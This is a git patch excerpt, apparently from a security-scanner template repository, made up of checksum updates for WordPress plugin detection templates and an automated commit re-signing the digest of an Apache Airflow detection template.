-http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:0063727e2c7ac5322fc551cd700671f917c60304 +http/technologies/wordpress/plugins/jetpack.yaml:bb140f10c1592047a3b8ec5a2a567d6576e2006e +http/technologies/wordpress/plugins/kadence-blocks.yaml:2c5f54e4bd0aecaff7e467e41e6d4c8176a2956e +http/technologies/wordpress/plugins/kirki.yaml:fbe3fc3cdf00a13efabddc058b14d2891bda2d10 +http/technologies/wordpress/plugins/leadin.yaml:dc4b649805d1aaa5970750a50c0947bc93213063 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:111340df8784d87e08b167a86660e38ef533929f +http/technologies/wordpress/plugins/limit-login-attempts.yaml:69686d96fbd74122fe5051c337fd20ee19e21d30 +http/technologies/wordpress/plugins/litespeed-cache.yaml:27102347051d8a76190798320f3c5a8db6d974e7 +http/technologies/wordpress/plugins/loco-translate.yaml:d001ca1c5c7b9cd438bfb6c689c8c7d5a03ba49f +http/technologies/wordpress/plugins/loginizer.yaml:71c3c9002d23043b66f0ea9ebd1966113b67b97c http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b1a2ac64ed191ad08002b7df29594e179c4da4bd +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:6f80ee60970fac6a5d3637ca02deac9ad6196fe2 +http/technologies/wordpress/plugins/mailpoet.yaml:892e52925c65450f3956d6a94cfc4ad8cad28d0b +http/technologies/wordpress/plugins/maintenance.yaml:7266d7246980628ac6a691674f1863a9a09f685a +http/technologies/wordpress/plugins/mainwp-child.yaml:084749769643249871a4dea287bfc1181e611e9a +http/technologies/wordpress/plugins/malcare-security.yaml:eb45bf9ddea2c84153eb42ea5056516470eae0b6 +http/technologies/wordpress/plugins/megamenu.yaml:53abfe4abb3a3546a9e80805536359465831522e +http/technologies/wordpress/plugins/members.yaml:eb9aa70ebef58ae731c3fbfcfce4644825bcf054 +http/technologies/wordpress/plugins/meta-box.yaml:2870a3b9bc2c19c1a76159e4447fda8d1ab34199 +http/technologies/wordpress/plugins/metform.yaml:aaf8cb7ce7440ced7f4860cb611337228353081e +http/technologies/wordpress/plugins/ml-slider.yaml:f17578bd39a2b905613db1f9d7002993215a986d +http/technologies/wordpress/plugins/newsletter.yaml:81fc40343e5556373e9153fb6f8382d04d1f008e +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:04127e2becaa6d815f286607afbced988b838234 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:3fa8767f8375a91ed9c56f51251fa055e587258a +http/technologies/wordpress/plugins/ninja-forms.yaml:7d2c5e18e6097dd9142e815dd8f5c36b54a818ed +http/technologies/wordpress/plugins/ocean-extra.yaml:101659ab81f5027e69b9496d49258111df592e0a +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:586bdcb217992655954d142c66c76c39eb3c51b9 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:bd8ea8a0723bd91b6b218f5bb082a62038c5a46d +http/technologies/wordpress/plugins/optinmonster.yaml:592de23a60bd950835dc547aa427570de4451087 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d24dc77a7d07390ff00d05d679a7d9d051ccfa9 +http/technologies/wordpress/plugins/password-protected.yaml:c09cc08d25ffec19d9bddb80dcaca126cd8214f1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:7dc6dccf029f556d8024e86d7f983b7c970873eb http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:d59444a33c177c82fc542b17cc5c5a6d1de898cd +http/technologies/wordpress/plugins/pixelyoursite.yaml:b1a1707e9ea73fa3c815ec7425d3b8fcf1b1eadd +http/technologies/wordpress/plugins/polylang.yaml:474b86b03c47fd6c71387ac75a57f2605561c588 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:3ed0cb4e0842445653d4b6f4284f9cab51b337cd +http/technologies/wordpress/plugins/post-smtp.yaml:5c180878d4a566d9e35f49d47fa1a32e298f1db3 +http/technologies/wordpress/plugins/post-types-order.yaml:46ff92ab4c3b0f3f882b4cde5f4482af345d0165 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:72ec0fb4c2b0495c6a85806bbd7a41cf570e5ba5 +http/technologies/wordpress/plugins/pretty-link.yaml:7d2595787ef71bfc0f8263b352950574c82afbbd +http/technologies/wordpress/plugins/really-simple-captcha.yaml:820fb389b06874e8609b9cb97946e84ba0d4990e +http/technologies/wordpress/plugins/really-simple-ssl.yaml:ea5b1a5d00a1bfe9040eb5a23dc864d6b4c00e5d +http/technologies/wordpress/plugins/redirection.yaml:86f2c0d6ee7b8f4be33b172415d121cca0c0fc48 +http/technologies/wordpress/plugins/redux-framework.yaml:77d5d95bf85d6717e879e204e15bd12328af0772 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:911acc0810788cbded5214fe73d71c572cf101ed +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:be3e61e48eb34279bbe7c84eb013417222c2b5e8 +http/technologies/wordpress/plugins/safe-svg.yaml:a210a5588617bc1fa9dee29779b886e3e8effe4c +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:9daa6afe994199102a2d27647f7289e5a75e937d +http/technologies/wordpress/plugins/sg-cachepress.yaml:cfbfebaa8032cc1cc442bcef45c6fcb738d991ff +http/technologies/wordpress/plugins/sg-security.yaml:67b421bf7f537d741b6498008b25f145905b409b +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:909597cab42dda480c2b8f6bcfb93b776ceb071f +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:eb62954c099fd040e0a841a6763895bf70af5155 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:7621180c487cc3140d4025a0d41b3f8a2d50b60a +http/technologies/wordpress/plugins/simple-history.yaml:f28952411d1d06b36dff1dd3ad2f0977ced41299 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:e2ee08639c89ccd9bce93751a2af5f0811625b00 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:d8b01acbb97663782bb2dcedfe15120cc436e270 +http/technologies/wordpress/plugins/smart-slider-3.yaml:273c9034d34b21bd24dfaeb4cfbb50f261c8ec35 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:ec9b1dd5baadb957a5024484538a923d3fbfd8b1 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b4be0a274e0e8f4d23826d09d4bd337e7e121295 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:349a5a2836a67e5aeeca8ef1fef577003e16c12b +http/technologies/wordpress/plugins/sucuri-scanner.yaml:2d32a809cfdaf412a4ff8847d5f0b24896f2166a http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:7838667e6eaf29a7718aa4a3007acc7b19326275 +http/technologies/wordpress/plugins/tablepress.yaml:a59b63b077703bae19256601e2f054fd3ab88c05 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a5ee503fc1ce460363d66fd08627a5aab79e0efd +http/technologies/wordpress/plugins/templately.yaml:2db3b797ef0a62165f2c311073ece669e135c8c4 +http/technologies/wordpress/plugins/the-events-calendar.yaml:1445a9f55118fc7c160041892f8d57d1c18a55f8 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:b0d6964edb54e6bfcf5592e4a6c554a6dc3994bb +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97fd1f5f89ad4326876884779c11ac25c36d2956 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:0040d3f036440bec9a35e0417734d55766c9434b +http/technologies/wordpress/plugins/under-construction-page.yaml:d43fc2fb8627533a49d8b2c2da77fd540534ff41 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:cbc91cf7ce469434f73d844364722b875291b2d3 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:d14c554fb8aa859859b95246765c241b76449e8c http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:6ad4f075c3b11ab9ab8ab22afb12916cb1ac85a1 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:182dff70a183be1ce58d398f325dce067a7be421 +http/technologies/wordpress/plugins/webp-express.yaml:d96dbe01868e7f6c294a7f0ef5f9a06ca937019a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:bd4413b1636802ae18dfa8fb311c28c6aea1f578 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:196218a0da05878689fd400af5eb4e4d8539d8cc +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0cf0f384811980e615be535800d170a87db872bd +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1f65c870b9f2f91a951f70ade0312a0cfab1661a http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:1afc52f929ec9582fb3278094f229c10bc4bbfe5 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:8f22f2db9650e88efaf2fc5981be84e768ece1de +http/technologies/wordpress/plugins/woocommerce-payments.yaml:fd658cedd8cf8a63c2dd7ed0f27256609501a08b +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:7dbfcf09843dfc1877ff29ffeef7a40dc6fecc5a +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e9d8fc04347388ee797bb3ee322f01f3530a700a +http/technologies/wordpress/plugins/woocommerce-services.yaml:4f1f3b1eb1de8b786c2703f924c6ab5d7a0c7589 +http/technologies/wordpress/plugins/woocommerce.yaml:60a184c63a41e4dc512c1da9ff3735ab605dad61 +http/technologies/wordpress/plugins/wordfence.yaml:2738513fb3811d043d0cedcd96829f663eab94e7 +http/technologies/wordpress/plugins/wordpress-importer.yaml:0212f60dbff855eae87944cc3c4f83bd27585c43 +http/technologies/wordpress/plugins/wordpress-seo.yaml:e5c7f6f2aecddb9fe6241a41b962188d453d6f97 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:54ca4f53e69168d17b1df9256f30d09055ea79bd +http/technologies/wordpress/plugins/wp-crontrol.yaml:a819e65274a3de58b05ab005431f3e918bc22962 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8217364e18e66f7ce3a4fa77d099eb35fe039330 +http/technologies/wordpress/plugins/wp-file-manager.yaml:3272d9107223b4e01fa7506d51d78da565bbc833 +http/technologies/wordpress/plugins/wp-google-maps.yaml:bde2b1813974517a05a2fad0e82af9944261b63c +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4570f87f20178bcd3e02c8c5891f33acee857006 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:3e623bc7c56701d405692a8ed5e861c8c2cd5b95 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:f4dbb7e61a436a4da4134dc2d868c6915331dcd1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:2393cc8bc78037fbc8167c2438ae7a63d0a9d637 +http/technologies/wordpress/plugins/wp-optimize.yaml:f7984b59e04a45299bba6b33f5b37bad3fc66b72 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:3edd03c615851555bb2b084e4dbed8a06a890e9e +http/technologies/wordpress/plugins/wp-reset.yaml:33a0ae96e4ad9cfbbe07d9a155dbe09016eabe76 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e9768ac87eb7db331577151f493cf2319b2769bd +http/technologies/wordpress/plugins/wp-rollback.yaml:cb17d5ebe6a8dcaba932c945aacb90479feb3f97 +http/technologies/wordpress/plugins/wp-seopress.yaml:f770591280993a565f19a40f1007b1238b0d0386 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b68110c8120d21e32f19068852501e00b675d5bb +http/technologies/wordpress/plugins/wp-smushit.yaml:76a39dc9526ba71cf5d38d5128b3bd15caaa7484 +http/technologies/wordpress/plugins/wp-statistics.yaml:7b70469b68973f20bca95a7df4648adeaf678e52 +http/technologies/wordpress/plugins/wp-super-cache.yaml:a4cc188458f26ccb496e108f106caccd85f54edd http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:68c90673d799faf2f3942d0f3738503d3ba71fac +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:840b896ad7646bc99ec66fbb0814038cd2849a52 +http/technologies/wordpress/plugins/wpforms-lite.yaml:a4e58c9002ad922e9d2def6996c08da1fa1ceb51 +http/technologies/wordpress/plugins/wps-hide-login.yaml:61957fd8a9885be1a9b55d5caf48be9db3766524 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:8ddfd01cdf4c89c955859cba4e134594d4eb1557 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e741854d5d621f89fe039b8fffb795b0ac2227c0 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8888,7 +8888,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8a6aa78697c27df1a9b49a97349ce50daf43a30b +templates-checksum.txt:f6ac373ab772212e09396bc03203208dff7196ef wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 616e6c6046f0487e69aaa25ce21e06ca762d929e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 14:29:15 +0000 Subject: [PATCH 247/247] Auto Template Signing [Wed Jul 17 14:29:15 UTC 2024] :robot: --- http/technologies/apache/airflow-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index b85792d59bf..89e53422cca 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -25,5 +25,4 @@ http: - type: status status: - 404 - -# digest: 4b0a0048304602210090bc87e2b346dc271828d73439387b1b3025a6a7b967cef6a74fea8466ff74fe022100ed3f535da14e849368eec9d5eccba31a7dc7712627910bd2974c40c86828a04e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file